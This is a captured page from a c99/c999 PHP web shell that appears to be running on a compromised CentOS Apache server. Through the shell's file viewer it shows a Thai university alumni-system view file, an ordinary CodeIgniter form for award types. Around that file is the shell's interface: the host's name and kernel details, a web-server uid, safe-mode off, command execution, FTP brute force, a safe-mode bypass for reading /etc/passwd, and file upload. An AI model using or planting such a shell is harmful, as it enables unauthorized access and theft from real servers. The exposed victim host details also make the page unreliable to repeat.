!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/ealumni/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_addTypeAward.php (4.43 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$row_ta 
= (isset($qu_ta) && $qu_ta!=NULL) ? $qu_ta->row() : NULL;
?>
<table width="100%">
    <tr>
        <td align="center"><span class="h error">ข้อมูลประเภทรางวัล</span></td>
    </tr>
    <tr>
        <td><br /></td>
    </tr>
<?php
    
if($this->session->flashdata('flgSave')) {
?>
    <tr>
        <td align="center"><?php echo $this->session->flashdata('flgSave');?></td>
    </tr>
<?php
    
}
?>
    <tr>
        <td><table class="szone"><?php echo form_open($this->config->item("ea_folder")."basedata/typeaward_insert_update", array("name" => "myform""id" => "myform"));?>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone2">ชื่อประเภทรางวัล ภาษาไทย</td>
                <td><input type="text" name="typeAwardNameT" id="typeAwardNameT" value="<?php echo set_value('typeAwardNameT'setValue('typeAwardNameT',$row_ta));?>" size="50" maxlength="100" />
                <span class="error"> * <?php echo form_error('typeAwardNameT');?></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone2">ชื่อประเภทรางวัล ภาษาอังกฤษ</td>
                <td><input type="text" name="typeAwardNameE" id="typeAwardNameE" value="<?php echo set_value('typeAwardNameE'setValue('typeAwardNameE',$row_ta));?>" size="50" maxlength="100" />
                <span class="error"> * <?php echo form_error('typeAwardNameE');?></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td colspan="2" align="center">
                <input type="submit" name="add" id="add" value="บันทึก" />
                <input type="reset" name="clear" id="clear" value="เคลียร์ข้อมูล" />
                <input type="hidden" name="typeAwardId" id="typeAwardId" value="<?php echo setValue('typeAwardId',$row_ta);?>" />
                </td>
            </tr>
        <?php echo form_close();?></table></td>
    </tr>
    <tr>
        <td><br /></td>
    </tr>
    <tr>
        <td align="right">ส่งออก <img class="hand" title="ส่งออกเป็น excel" src="<?php echo base_url().$this->config->item('rg_excel_exp');?>" align="absmiddle" border="0" onClick="sendPost('hidform',{},
        '<?php echo site_url($this->config->item('ea_folder').'basedata/typeaward_ex');?>')" />
        </td>
    </tr>
    <tr>
        <td><table class="headCol">
            <tr bgcolor="<?php echo $this->config->item('table_c_even');?>">
                <th class="seqCol">ลำดับที่</th>
                <th>ชื่อประเภทรางวัล ภาษาไทย</th>
                <th>ชื่อประเภทรางวัล ภาษาอังกฤษ</th>
                <th class="editCol">แก้ไข</th>
                <th class="deleteCol">ลบ</th>
            </tr>
<?php
    $i 
0;
    if(isset(
$rs_ta) && $rs_ta->num_rows()) {
        foreach(
$rs_ta->result() as $row_ta) {
            echo 
"<tr onmouseover=\"bgColor='".$this->config->item('tr_c_even')."'\" onmouseout=\"bgColor='".$this->config->item("rg_mouseout")."'\">";
?>
                <td align="center"><?php echo $i+1;?></td>
                <td class="indent"><?php echo $row_ta->typeAwardNameT;?></td>
                <td class="indent"><?php echo $row_ta->typeAwardNameE;?></td>
                <td align="center">
                <img class="hand" src="<?php echo base_url().$this->config->item('rg_edit');?>" align="absmiddle" border="0" onClick="sendPost('hidform',
                {'typeAwardId':<?php echo $row_ta->typeAwardId;?>},
                 '<?php echo site_url($this->config->item('ea_folder').'basedata/typeaward_input');?>')" />
                </td>
                <td align="center">
                <img class="hand" src="<?php echo base_url().$this->config->item('rg_delete');?>" align="absmiddle" border="0" onClick="confirmDel2({typeAwardId:<?php echo $row_ta->typeAwardId;?>}, 'm_form1','<?php echo site_url($this->config->item('ea_folder').'basedata/typeaward_delete');?>')" /></td>
            </tr>
<?php
            $i
++;
        }
    } else {
?>
            <tr>
                <td align="center" colspan="5"><span class="error">** ไม่ปรากฏรายการในฐานข้อมูล **</span></td>
            </tr>
<?php
    
}
?>
        </table></td>
    </tr>
    <tr>
        <td align="right">รวม <?php echo $i;?> รายการ</td>
    </tr>
    <tr>
        <td><table class="mark">
            <tr>
                <td class="coltd_mark"><span class="error"><b>หมายเหตุ :</b></span></td>
                <td><span class="error">* หมายถึง ต้องกรอกข้อมูลให้สมบูรณ์</span></td>
            </tr>
        </table></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0131 ]--